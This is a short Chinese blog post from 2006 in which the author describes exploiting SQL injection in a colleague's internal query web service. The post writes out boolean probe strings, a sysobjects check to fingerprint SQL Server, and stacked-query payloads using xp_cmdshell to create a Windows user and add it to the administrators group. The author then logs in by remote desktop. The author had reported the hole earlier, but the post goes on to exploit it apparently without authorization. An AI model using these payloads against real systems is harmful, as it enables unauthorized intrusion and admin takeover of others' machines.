Fantacy
人工智能,智能运营,智能客服,企业知识管理系统(Kmaster,SuperKM)
上周末 会议汇报时,zhangww提供了查询奥威内部信息的web service
http://192.168.0.67/****/a.asmx

可以输入名字简称字符串如zhangww,并返回相关信息

凭直觉,估计有SQL漏洞(奥威以前的网站、服务都没考虑这点)
经测试,输入zhangww' and '1'='1, 返回成功信息
输入zhangww' and '1'='1,返回没有匹配信息
输入zhangww' and1 '1'='1 返回没有匹配信息
果然有,不过外层try catch了一下 不能取得Sql错误以获取详细信息
于是告诉他 有漏洞

今早过去,发现仍能注入。。
于是决定玩一下

输入 zhangww' and (select count(*) from sysobjects)>0 and '1'='1 ,返回成功信息
Sql Server数据库

增加用户:
输入 zhangww;exec master.dbo.xp_cmdshell 'net user name password /add' --
提升为管理员:
输入 zhangww;exec master.dbo.xp_cmdshell 'net localgroup administrators name /add' --

远程桌面,连上。。
(居然Sql是用sa连的。。)


posted on 2006-06-05 20:12  calmzeal  阅读(592)  评论(7编辑  收藏  举报